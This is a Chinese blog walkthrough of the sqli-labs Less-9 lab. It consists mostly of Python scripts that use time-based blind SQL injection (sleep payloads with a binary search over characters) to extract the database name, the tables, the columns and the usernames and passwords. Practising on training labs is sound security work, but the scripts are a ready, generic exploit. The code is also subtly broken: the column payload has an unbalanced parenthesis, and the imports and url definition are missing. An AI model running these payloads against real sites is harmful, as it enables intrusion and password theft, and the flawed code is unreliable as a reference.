-
SQL注入实例(sqli-labs/less-9)
0、初始页面
1、爆库名
使用python脚本
- def inject_database1(url):
- name = ''
- for i in range(1, 20):
- low = 32
- high = 128
- mid = (low + high) // 2
- while low < high:
- payload = "1' and if(ascii(substr(database(),%d,1)) > %d ,sleep(2),0)-- " % (i, mid)
- res = {"id": payload}
- start_time = time.time()
- r = requests.get(url, params=res)
- end_time = time.time()
- if end_time - start_time >= 2:
- low = mid + 1
- else:
- high = mid
- mid = (low + high) // 2
- if mid == 32:
- break
- name = name + chr(mid)
- print(name)
- inject_database1(url)
2、爆表名
使用python脚本
- def inject_database1(url):
- name = ''
- for i in range(1, 20):
- low = 32
- high = 128
- mid = (low + high) // 2
- while low < high:
- payload = "1' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),%d,1)) > %d ,sleep(1),0)-- " % (i, mid)
- res = {"id": payload}
- start_time = time.time()
- r = requests.get(url, params=res)
- end_time = time.time()
- if end_time - start_time >= 1:
- low = mid + 1
- else:
- high = mid
- mid = (low + high) // 2
- if mid == 32:
- break
- name = name + chr(mid)
- print(name)
- inject_database1(url)
3、爆列名
使用python脚本
- def inject_database1(url):
- name = ''
- for i in range(1, 20):
- low = 32
- high = 128
- mid = (low + high) // 2
- while low < high:
- payload = "1' and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),%d,1) > %d ,sleep(1),0)-- " % (i, mid)
- res = {"id": payload}
- start_time = time.time()
- r = requests.get(url, params=res)
- end_time = time.time()
- if end_time - start_time >= 1:
- low = mid + 1
- else:
- high = mid
- mid = (low + high) // 2
- if mid == 32:
- break
- name = name + chr(mid)
- print(name)
- inject_database1(url)
4、显示最终目的
使用python脚本
- def inject_database1(url):
- name = ''
- for i in range(1, 20):
- low = 32
- high = 128
- mid = (low + high) // 2
- while low < high:
- payload = "1' and if(ascii(substr((select group_concat(username,0x3a,password) from users),%d,1)) > %d ,sleep(1),0)-- " % (i, mid)
- res = {"id": payload}
- start_time = time.time()
- r = requests.get(url, params=res)
- end_time = time.time()
- if end_time - start_time >= 1:
- low = mid + 1
- else:
- high = mid
- mid = (low + high) // 2
- if mid == 32:
- break
- name = name + chr(mid)
- print(name)
-
相关阅读:
Android12之报错 error: BUILD_COPY_HEADERS is obsolete(一百六十七)
需求响应|动态冰蓄冷系统与需求响应策略的优化研究(Matlab代码实现)
解析DDD开发框架Axon
NTLM与kerberos认证体系详解
下篇 | 使用 🤗 Transformers 进行概率时间序列预测
linux gcc专题(三) gdb调试
gitee 远程仓库
18数藏解析
基于springboot的社区团购系统设计与实现
Python_15 ddt驱动与日志
- 原文地址:https://blog.csdn.net/Thewei666/article/details/140937624